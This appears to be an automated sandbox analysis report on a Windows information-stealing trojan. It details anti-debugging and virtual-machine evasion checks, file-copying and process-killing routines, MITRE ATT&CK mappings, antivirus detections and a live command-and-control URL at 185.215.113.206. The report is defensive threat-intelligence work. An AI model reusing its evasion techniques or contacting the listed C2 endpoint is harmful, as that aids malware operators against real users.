                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE51A second address: FFE520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE841 second address: FFE85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE85F second address: FFE867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE867 second address: FFE86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFE86D second address: FFE888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F06h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFEB5A second address: FFEB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC2C8B990A6h 0x0000000b popad 0x0000000c jnl 00007FC2C8B990A1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FFEB88 second address: FFEB9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8DD5EF8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jbe 00007FC2C8DD5EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10036FB second address: 100371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007FC2C8B99096h 0x00000011 popad 0x00000012 jmp 00007FC2C8B990A1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100371E second address: 100372F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8DD5EFBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 100548A second address: 10054A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FC2C8B9909Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10054A0 second address: 10054AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101188E second address: 10118A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B9909Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FC2C8B99096h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10204EA second address: 10204F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10204F0 second address: 102050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102345F second address: 1023467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1022FA7 second address: 1022FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A2h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC2C8B990A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1022FC7 second address: 1022FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC2C8DD5EF6h 0x0000000a jg 00007FC2C8DD5F24h 0x00000010 push ebx 0x00000011 jmp 00007FC2C8DD5F06h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007FC2C8DD5EF6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102313B second address: 102313F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102313F second address: 102314A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 102314A second address: 1023152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1023152 second address: 1023157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1023157 second address: 102316A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1033176 second address: 10331BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC2C8DD5EF6h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2C8DD5F08h 0x00000015 push ecx 0x00000016 jmp 00007FC2C8DD5F09h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10331BA second address: 10331BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10331BF second address: 10331CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FC2C8DD5EF6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032124 second address: 103212F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8B99096h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032552 second address: 103255F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103287E second address: 1032884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032884 second address: 1032894 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2C8DD5EF6h 0x00000008 jbe 00007FC2C8DD5EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032894 second address: 1032899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032B79 second address: 1032B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F07h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032CF0 second address: 1032CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1032E6A second address: 1032E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10348CD second address: 1034904 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99098h 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FC2C8B990A8h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push ebx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1034904 second address: 1034909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1034909 second address: 1034919 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2C8B99098h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103726A second address: 1037270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10374AF second address: 10374BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10374BB second address: 10374C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC2C8DD5EF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10374C6 second address: 103751E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b mov dword ptr [ebp+1246BD01h], esi 0x00000011 pop edx 0x00000012 jmp 00007FC2C8B990A3h 0x00000017 push 00000004h 0x00000019 xor dword ptr [ebp+124471A9h], ecx 0x0000001f call 00007FC2C8B99099h 0x00000024 jnl 00007FC2C8B990ACh 0x0000002a pushad 0x0000002b jmp 00007FC2C8B9909Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10391E1 second address: 10391E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103AD92 second address: 103ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC2C8B990A8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B9909Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103ADBF second address: 103ADDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F06h 0x00000007 jp 00007FC2C8DD5EFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 515046B second address: 5150491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 928Eh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC2C8B990A7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5150491 second address: 51504B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51504B9 second address: 51504E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8B990A5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DADABB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DADA0C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F6AC27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-38942)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2164671572.0000000001574000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2164671572.00000000015A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37642)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37754)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37769)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37757)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37809)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37775)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AC4610 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00AD9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, | 0_2_00AD98E0
Source: file.exe, file.exe, 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B075A8 cpuid | 0_2_00B075A8
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00AD7D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, | 0_2_00AD6BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00AD79E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00AD7BC0

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2118707985.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2164671572.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (each tactic column listed as a row; the number in parentheses is the count of matched signatures for that technique, entries without a number were not matched)

• Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
• Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
• Execution: Command and Scripting Interpreter (2), Native API (12), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
• Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
• Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (12), DLL Side-Loading (1)
• Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
• Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (334)
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
• Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
• Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 39% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
http://185.215.113.206/ | 19% | Virustotal |
http://185.215.113.206/6c4adf523b719729.php | 17% | Virustotal |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.phptop | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/- | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/: | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpK | file.exe, 00000000.00000002.2164671572.0000000001588000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
